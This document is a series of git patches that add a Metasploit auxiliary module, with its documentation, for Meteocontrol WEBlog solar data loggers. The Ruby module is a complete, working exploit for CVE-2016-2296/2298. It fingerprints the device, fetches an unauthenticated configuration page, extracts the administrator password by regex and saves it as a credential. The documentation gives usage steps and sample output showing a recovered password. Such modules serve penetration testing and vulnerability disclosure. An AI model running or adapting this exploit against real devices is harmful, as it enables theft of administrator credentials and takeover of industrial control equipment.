From 39423a70a7d9e90c2e42a9f6a82d263928b68965 Mon Sep 17 00:00:00 2001 From: juushya Date: Fri, 6 Jan 2017 15:20:41 +0530 Subject: [PATCH 1/6] Add Meteocontrol Weblog Extract Admin password module --- .../http/meteocontrol_weblog_extractadmin.rb | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb new file mode 100644 index 0000000000..aeefa7a895 --- /dev/null +++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb @@ -0,0 +1,133 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Meteocontrol WEBlog Password Extractor', + 'Description' => %{ + This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models). This vulnerability allows extracting Administrator password for the device management portal. + }, + 'References' => + [ + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01' ], + [ 'CVE', '2016-2296' ], + [ 'CVE', '2016-2298' ] + ], + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly. + ], self.class) + end + + def run_host(ip) + unless is_app_metweblog? + return + end + + do_extract + end + + # + # Check if App is Meteocontrol WEBlog + # + + def is_app_metweblog? + begin + res = send_request_cgi( + { + 'uri' => '/html/en/index.html', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + print_error("#{rhost}:#{rport} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and (res.headers['Server'] and res.headers['Server'].include?("IS2 Web Server") or res.body.include?("WEB'log"))) + print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...") + return true + else + print_error("#{rhost}:#{rport} - Application does not appear to be Meteocontrol WEBlog. Module will not continue.") + return false + end + end + + # + # Extract Administrator Password + # + + def do_extract() + + print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...") + begin + res = send_request_cgi( + { + 'uri' => '/html/en/confAccessProt.html', + 'method' => 'GET' + }) + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{rhost}:#{rport} - HTTP Connection Failed...") + return + end + + if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/) + get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/) + admin_password = get_admin_password[1] + print_good("#{rhost}:#{rport} - Password is #{admin_password}") + report_cred( + ip: rhost, + port: rport, + service_name: 'Meteocontrol WEBlog Management Portal', + password: admin_password, + proof: res.body) + else + # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases. + print_error("Password not found. Check login manually.") + end + end + + def report_cred(opts) + service_data = { + address: opts[:ip], + port: opts[:port], + service_name: opts[:service_name], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + last_attempted_at: Time.now, + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end +end From 93168648b4f9843ccb71dc702ccacde3e945870e Mon Sep 17 00:00:00 2001 From: juushya Date: Sun, 8 Jan 2017 13:28:07 +0530 Subject: [PATCH 2/6] Minor update in description --- .../auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb index aeefa7a895..4e8a42aa61 100644 --- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb +++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Meteocontrol WEBlog Password Extractor', 'Description' => %{ - This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models). This vulnerability allows extracting Administrator password for the device management portal. + This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models) to extract Administrator password for the device management portal. }, 'References' => [ From dc33d417e029e8970342eb257343397164a9745f Mon Sep 17 00:00:00 2001 From: juushya Date: Sun, 8 Jan 2017 13:44:38 +0530 Subject: [PATCH 3/6] Add Meteocontrol Weblog Doc - PR #7790 --- .../http/meteocontrol_weblog_extractadmin.md | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md new file mode 100644 index 0000000000..68d227a58d --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md @@ -0,0 +1,54 @@ +Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal. + +Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases. + +## Verification Steps + +1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set RPORT [PORT]``` +4. Do: ```run``` + +## Sample Output + + ``` +msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin +msf auxiliary(meteocontrol_weblog_extractadmin) > info + + Name: MeteoControl WEBLog Password Extractor + Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin + License: Metasploit Framework License (BSD) + Rank: Normal + +Provided by: + Karn Ganeshen + +Basic options: + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target address range or CIDR identifier + RPORT 8080 yes The target port + SSL false no Negotiate SSL/TLS for outgoing connections + THREADS 1 yes The number of concurrent threads + VHOST no HTTP server virtual host + +Description: + This module exploits an authentication bypass vulnerability in + Meteocontrol WEBLog (all models) to extract Administrator password + for the device management portal. + +References: + https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01 + http://cvedetails.com/cve/2016-2296/ + http://cvedetails.com/cve/2016-2298/ + +msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4 +msf auxiliary(meteocontrol_weblog_extractadmin) > run + +[+] 1.2.3.4:8080 - Running Meteocontrol WEBlog management portal... +[*] 1.2.3.4:8080 - Attempting to extract Administrator password... +[+] 1.2.3.4:8080 - Password is password +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed + ``` From 657c7444bf279a4ff0852e4d257a1d940a001963 Mon Sep 17 00:00:00 2001 From: juushya Date: Tue, 17 Jan 2017 00:17:57 +0530 Subject: [PATCH 4/6] rubocop check & msftidy clean. Few updates. --- .../http/meteocontrol_weblog_extractadmin.md | 32 +----------- .../http/meteocontrol_weblog_extractadmin.rb | 52 +++++++++---------- 2 files changed, 27 insertions(+), 57 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md index 68d227a58d..a1eba6a6c9 100644 --- a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md +++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md @@ -4,7 +4,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There ## Verification Steps -1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin``` +1. Do: ```use auxiliary/scanner/http/meteocontrol_weblog_extractadmin``` 2. Do: ```set RHOSTS [IP]``` 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` @@ -13,36 +13,6 @@ Note: In some versions, 'Website password' page is renamed or not present. There ``` msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin -msf auxiliary(meteocontrol_weblog_extractadmin) > info - - Name: MeteoControl WEBLog Password Extractor - Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin - License: Metasploit Framework License (BSD) - Rank: Normal - -Provided by: - Karn Ganeshen - -Basic options: - Name Current Setting Required Description - ---- --------------- -------- ----------- - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS yes The target address range or CIDR identifier - RPORT 8080 yes The target port - SSL false no Negotiate SSL/TLS for outgoing connections - THREADS 1 yes The number of concurrent threads - VHOST no HTTP server virtual host - -Description: - This module exploits an authentication bypass vulnerability in - Meteocontrol WEBLog (all models) to extract Administrator password - for the device management portal. - -References: - https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01 - http://cvedetails.com/cve/2016-2296/ - http://cvedetails.com/cve/2016-2298/ - msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4 msf auxiliary(meteocontrol_weblog_extractadmin) > run diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb index 4e8a42aa61..2887c85bb7 100644 --- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb +++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb @@ -15,25 +15,25 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Meteocontrol WEBlog Password Extractor', 'Description' => %{ - This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models) to extract Administrator password for the device management portal. + This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal. }, 'References' => [ - [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01' ], - [ 'CVE', '2016-2296' ], - [ 'CVE', '2016-2298' ] + ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'], + ['CVE', '2016-2296'], + ['CVE', '2016-2298'] ], 'Author' => [ - 'Karn Ganeshen ', + 'Karn Ganeshen ' ], - 'License' => MSF_LICENSE - )) + 'License' => MSF_LICENSE)) register_options( - [ - Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly. - ], self.class) + [ + Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly. + ], self.class + ) end def run_host(ip) @@ -50,17 +50,17 @@ class MetasploitModule < Msf::Auxiliary def is_app_metweblog? begin - res = send_request_cgi( - { - 'uri' => '/html/en/index.html', - 'method' => 'GET' + res = send_request_cgi({ + 'uri' => '/html/en/index.html', + 'method' => 'GET' }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError print_error("#{rhost}:#{rport} - HTTP Connection Failed...") return false end - if (res and res.code == 200 and (res.headers['Server'] and res.headers['Server'].include?("IS2 Web Server") or res.body.include?("WEB'log"))) + if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?("IS2 Web Server") || res.body.include?("WEB'log"))) print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...") return true else @@ -77,27 +77,27 @@ class MetasploitModule < Msf::Auxiliary print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...") begin - res = send_request_cgi( - { - 'uri' => '/html/en/confAccessProt.html', - 'method' => 'GET' + res = send_request_cgi({ + 'uri' => '/html/en/confAccessProt.html', + 'method' => 'GET' }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE print_error("#{rhost}:#{rport} - HTTP Connection Failed...") return end - if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/) + if (res && res.code == 200 && (res.body.include?("szWebAdminPassword") || res.body=~ /Admin Monitoring/)) get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/) admin_password = get_admin_password[1] print_good("#{rhost}:#{rport} - Password is #{admin_password}") report_cred( - ip: rhost, - port: rport, - service_name: 'Meteocontrol WEBlog Management Portal', - password: admin_password, - proof: res.body) + ip: rhost, + port: rport, + service_name: 'Meteocontrol WEBlog Management Portal', + password: admin_password, + proof: res.body + ) else # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases. print_error("Password not found. Check login manually.") From 36416c20cb574a8d5b6e23f5faf2e1344e52b775 Mon Sep 17 00:00:00 2001 From: juushya Date: Sat, 4 Feb 2017 03:00:31 +0530 Subject: [PATCH 5/6] Updated check for extract fail case now + Minor edits --- .../http/meteocontrol_weblog_extractadmin.rb | 47 ++++++++++--------- 1 file changed, 25 insertions(+), 22 deletions(-) diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb index 2887c85bb7..619cbf410c 100644 --- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb +++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb @@ -13,21 +13,21 @@ class MetasploitModule < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => 'Meteocontrol WEBlog Password Extractor', + 'Name' => 'Meteocontrol WEBlog Password Extractor', 'Description' => %{ This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal. }, - 'References' => + 'References' => [ ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'], ['CVE', '2016-2296'], ['CVE', '2016-2298'] ], - 'Author' => + 'Author' => [ 'Karn Ganeshen ' ], - 'License' => MSF_LICENSE)) + 'License' => MSF_LICENSE)) register_options( [ @@ -51,8 +51,8 @@ class MetasploitModule < Msf::Auxiliary def is_app_metweblog? begin res = send_request_cgi({ - 'uri' => '/html/en/index.html', - 'method' => 'GET' + 'uri' => '/html/en/index.html', + 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError @@ -60,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary return false end - if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?("IS2 Web Server") || res.body.include?("WEB'log"))) + if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?('IS2 Web Server') || res.body.include?("WEB'log"))) print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...") return true else @@ -74,12 +74,11 @@ class MetasploitModule < Msf::Auxiliary # def do_extract() - print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...") begin res = send_request_cgi({ - 'uri' => '/html/en/confAccessProt.html', - 'method' => 'GET' + 'uri' => '/html/en/confAccessProt.html', + 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE @@ -87,20 +86,24 @@ class MetasploitModule < Msf::Auxiliary return end - if (res && res.code == 200 && (res.body.include?("szWebAdminPassword") || res.body=~ /Admin Monitoring/)) + if (res && res.code == 200 && (res.body.include?('szWebAdminPassword') || res.body=~ /Admin Monitoring/)) get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/) - admin_password = get_admin_password[1] - print_good("#{rhost}:#{rport} - Password is #{admin_password}") - report_cred( - ip: rhost, - port: rport, - service_name: 'Meteocontrol WEBlog Management Portal', - password: admin_password, - proof: res.body - ) + if get_admin_password[1] + admin_password = get_admin_password[1] + print_good("#{rhost}:#{rport} - Password is #{admin_password}") + report_cred( + ip: rhost, + port: rport, + service_name: 'Meteocontrol WEBlog Management Portal', + password: admin_password, + proof: res.body + ) + else + # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Check login manually on http://IP:port/html/en/confAccessProt.html for the szWebAdminPassword field's value. + print_error("Check login manually on http://#{rhost}:#{rport}/html/en/confAccessProt.html for the 'szWebAdminPassword' field's value.") + end else - # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases. - print_error("Password not found. Check login manually.") + print_error("Check login manually on http://#{rhost}:#{rport}/html/en/confAccessProt.html for the 'szWebAdminPassword' field's value.") end end From d305f895ffd3514b052efa09480cca93977f74c9 Mon Sep 17 00:00:00 2001 From: juushya Date: Sat, 4 Feb 2017 11:59:45 +0530 Subject: [PATCH 6/6] Fixed a typo space --- .../auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb index 619cbf410c..41bcf70ae2 100644 --- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb +++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %{ This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal. }, - 'References' => + 'References' => [ ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'], ['CVE', '2016-2296'],